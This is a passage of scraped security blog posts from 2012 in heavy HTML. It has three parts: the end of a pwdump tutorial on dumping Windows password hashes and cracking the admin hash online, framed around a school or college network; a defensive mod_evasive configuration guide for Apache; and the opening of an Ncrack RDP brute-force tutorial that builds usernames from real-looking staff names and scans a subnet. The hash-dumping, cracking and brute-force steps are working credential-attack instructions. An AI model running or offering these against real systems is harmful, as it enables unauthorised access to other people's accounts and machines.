<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">4.</strong> Now enter<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> pwdump – localhost >></strong>“ destination of output file “ <strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">(for 32 computers)</strong> and p<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">wdump -x localhost >></strong> “destination out put file “<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">(for 64 bit computers )</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Example :-</strong></div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/03/10/decrypt-administrators-password-using-pwdumpfgdump/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">Pwdump localhost >> C:\hashes.txt
Pwdump -x localhost >> C:\hashes.txt</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">5. </strong>Now open the Out put file you can see the names of the different users with password hashes Now copy the hashes corresponding to the admin account</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cracking The Hashes</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Considering that we are in school/collage were we cant use tools to crack passwords so as an alternative we are using online password cracking sites</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">1. </strong>Go to online password cracking sites like<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> www.cracker.offensive-security.com</strong> ,<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">www.onlinehashcrack.com</strong> and paste the hash select hash type as LM and click decode</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">2.</strong>By this way we are able to crack windows password using a single tool</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Note:- If your not able to crack password hashes online use tools like john the ripper to crack password hashes . You can even copy the hashes and decoded it in your house</strong></div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3436039399135336524.post-83706886329019005622012-07-16T14:17:00.003+06:002012-07-16T14:17:46.356+06:00Protect your Apache web server with mod_evasive<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Mod_evasive is an <a href="http://httpd.apache.org/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Apache</a> module that is designed to limit the impact of different types of attacks (like<a href="http://en.wikipedia.org/wiki/Denial-of-service_attack" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">DDoS</a>, scripted or brute force) on your web site/server. When integrated with iptables, mod_evasive can stand up to even larger attacks.The module detects attacks by creating an internal hash of IP Addresses and URIs, and denying any single IP address from performing any of the following actions:</div>
<ul style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">request a page more than the allowed times per second</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">make more than 50 concurrent requests per second on the same child process</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">make a single request while blacklisted</li>
</ul>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
On <a href="http://www.debian.org/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Debian</a> or <a href="http://www.ubuntu.com/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Ubuntu</a> systems the installation is as easy as typing:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<code style="border-left-color: rgb(42, 46, 47); border-left-style: solid; border-width: 0px 0px 0px 1px; color: #197b30; display: block; font-family: 'Courier New', mono; margin: 0px; outline: 0px; padding: 5px 10px; vertical-align: baseline;">$ sudo apt-get install libapache2-mod-evasive</code></div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Once you do that, the module is already enabled and is protecting your web server. If you need to change the default thresholds, you need to insert the following lines in httpd.conf:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/04/08/protect-your-apache-web-server-with-mod_evasive/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;"><IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 300
</IfModule></pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<span id="more-1329" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
This following options can tweak the behavior of the module:</div>
<ul style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DOSHashTableSize</strong> – The hash table size defines the number of top-level nodes for each child’s hash table. Increasing this number will provide faster performance by decreasing the number of iterations required to get to the record, but consume more memory for table space. You should increase this if you have a busy web server. The value you specify will automatically be tiered up to the next prime number in the primes list (see mod_evasive.c for a list of primes used).</li>
</ul>
<ul style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DOSPageCount</strong> – This is the threshold for the number of requests for the same page (or URI) per page interval. Once the threshold for that interval has been exceeded, the IP address of the client will be added to the blocking list.</li>
</ul>
<ul style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DOSSiteCount</strong> – This is the threshold for the total number of requests for any object by the same client on the same listener per site interval. Once the threshold for that interval has been exceeded, the IP address of the client will be added to the blocking list.</li>
</ul>
<ul style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DOSPageInterval</strong> – The interval for the page count threshold; defaults to 1 second intervals.</li>
</ul>
<ul style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DOSSiteInterval</strong> – The interval for the site count threshhold; defaults to 1 second intervals.</li>
</ul>
<ul style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DOSBlockingPeriod</strong> – The blocking period is the amount of time (in seconds) that a client will be blocked for if they are added to the blocking list. During this time, all subsequent requests from the client will result in a 403 (Forbidden) and the timer being reset (e.g. another 10 seconds). Since the timer is reset for every subsequent request, it is not necessary to have a long blocking period; in the event of a DoS attack, this timer will keep getting reset.</li>
</ul>
<ul style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DOSEmailNotify</strong> – If this value is set, an email will be sent to the address specified whenever an IP address becomes blacklisted. A locking mechanism using /tmp prevents continuous emails from being sent.</li>
</ul>
<ul style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DOSSystemCommand</strong> – If this value is set, the system command specified will be executed whenever an IP address becomes blacklisted. This is designed to enable system calls to ip filter or other tools. A locking mechanism using /tmp prevents continuous system calls. Use %s to denote the IP address of the blacklisted IP.</li>
</ul>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
The last option is one of the most interesting, as it allows you to call iptables and filter the attacker’s IP address. Have fun experimenting with this great <strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Apache</strong> module!</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-38761720433912552162012-07-16T14:15:00.002+06:002012-07-16T14:16:06.801+06:00Ncrack – Remote Desktop Brute Force Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
jessie tagle<br style="margin: 0px; padding: 0px;" />julio feagins<br style="margin: 0px; padding: 0px;" />hugh duchene<br style="margin: 0px; padding: 0px;" />darmella martis<br style="margin: 0px; padding: 0px;" />lakisha mcquain<br style="margin: 0px; padding: 0px;" />ted restrepo<br style="margin: 0px; padding: 0px;" />kelly missildine</div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<span id="more-2005" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span><br style="margin: 0px; padding: 0px;" />Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname.</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
jtagle<br style="margin: 0px; padding: 0px;" />jfeagins<br style="margin: 0px; padding: 0px;" />hduchene<br style="margin: 0px; padding: 0px;" />dmartis<br style="margin: 0px; padding: 0px;" />lmcquain<br style="margin: 0px; padding: 0px;" />trestrepo<br style="margin: 0px; padding: 0px;" />kmissildine</div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Software required:</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Linux machine, preferably Ubuntu.<br style="margin: 0px; padding: 0px;" />nmap and terminal server client, sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">About Ncrack</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<em style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .</em><a href="http://nmap.org/ncrack/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">http://nmap.org/ncrack/</a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Installation</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/05/12/ncrack-remote-desktop-brute-force-tutorial/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb
[/pre]
<strong>Information gathering</strong>
Let’s find out what hosts in a network are up, and save them to a text list. The regular expression will parse and extract only the ip addresses from the scan.
Nmap ping scan, go no further than determining if host is online</pre>
</div>
</div>
</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/05/12/ncrack-remote-desktop-brute-force-tutorial/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Nmap fast scan with input from list of hosts/networks</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
